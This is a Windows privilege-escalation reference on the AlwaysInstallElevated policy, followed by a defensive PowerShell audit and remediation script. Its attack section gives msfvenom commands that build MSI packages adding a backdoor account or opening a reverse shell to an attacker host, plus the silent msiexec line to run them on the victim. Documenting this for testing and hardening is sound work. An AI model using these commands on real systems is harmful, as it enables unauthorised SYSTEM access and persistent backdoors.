AlwaysInstallElevated

AlwaysInstallElevated is a Windows policy setting that lets non-privileged users run Microsoft Windows Installer package files (MSI) with elevated (SYSTEM) permissions.

1. Detection

Check whether these registry values are set to "1":

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer

Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer

With PowerSploit:

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking for AlwaysInstallElevated registry key...

AbuseFunction : Write-UserAddMSI

With winPEAS:

winPEAS.exe

[+] Checking AlwaysInstallElevated(T1012)

AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!

2. If they are, create your own malicious MSI (attacker machine):

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi

msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={PORT} -a x64 --platform windows -f msi -o evil.msi

3. Then use msiexec on the victim to execute your MSI (victim machine):

msiexec /quiet /qn /i C:\evil.msi

4. The technique is also available in:

  • Metasploit: exploit/windows/local/always_install_elevated

  • PowerUp.ps1: Get-RegistryAlwaysInstallElevated, Write-UserAddMSI
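Defender-side audit for the detection step above, as an added example (not from the original page, PowerUp or winPEAS). It reads both policy keys, reports the effective state, and with -Remediate resets the values to 0; Windows Installer only honours the policy when the value is 1 in both HKLM and HKCU, so the check tests that combination. The script name Test-AlwaysInstallElevated.ps1 is assumed.

```powershell
# Test-AlwaysInstallElevated.ps1 (added example). Run as an administrator for -Remediate.
param([switch]$Remediate)

# Both policy keys that Windows Installer consults; the value must be 1 in both to take effect.
$paths = @{
    'HKLM' = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    'HKCU' = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

$state = @{}
foreach ($hive in $paths.Keys) {
    # SilentlyContinue turns a missing key or missing value into $null instead of an error.
    $item = Get-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        $state[$hive] = 'not set'
    } else {
        $state[$hive] = [int]$item.AlwaysInstallElevated
    }
    Write-Host ("{0}: AlwaysInstallElevated = {1}" -f $hive, $state[$hive])
}

$effective = ($state['HKLM'] -eq 1) -and ($state['HKCU'] -eq 1)

if ($effective) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any user can install an MSI as SYSTEM.'
    if ($Remediate) {
        foreach ($hive in $paths.Keys) {
            # The key exists here because a value of 1 was read from it.
            Set-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -Value 0 -Type DWord
            Write-Host ("{0}: AlwaysInstallElevated reset to 0" -f $hive)
        }
    }
    exit 1
}

Write-Host 'OK: policy is not effective (requires 1 in both HKLM and HKCU).'
exit 0
```

If the value is delivered by Group Policy, a registry reset is overwritten at the next policy refresh; disable "Always install with elevated privileges" under Windows Components > Windows Installer in both the Computer Configuration and User Configuration halves of the GPO instead.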
